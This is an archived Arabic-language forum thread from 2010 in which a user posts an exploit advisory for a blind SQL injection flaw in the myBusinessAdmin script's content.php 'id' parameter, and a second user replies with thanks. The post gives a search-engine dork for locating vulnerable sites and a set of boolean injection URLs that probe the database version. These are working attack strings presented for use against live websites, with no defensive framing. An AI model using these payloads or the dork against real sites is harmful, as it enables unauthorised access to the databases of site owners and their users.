المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : myBusinessAdmin (content.php) Blind Sql Injection Vulnerability



AtT4CKxT3rR0r1ST
02-03-2010, 02:58 PM
myBusinessAdmin (content.php) Blind Sql Injection Vulnerability
================================================== ============

################################################## ##################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : myBusinessAdmin
.:. Download Script: http://www.redcow.ca/products/mybusinessadmin/
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by myBusinessAdmin and Red Cow Technologies, Inc."

################################################## ##################

===[ Exploit ]===

www.site.com/content.php?id=[Blind SQL INJECTION]


www.site.com/content.php?id=NULL+and+1=1 >>> True
www.site.com/content.php?id=NULL+and+1=2 >>> False


www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=5 >>> True
www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=4 >>> False



################################################## ##################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

صقر العرب
02-05-2010, 07:52 PM
بارك الله فيك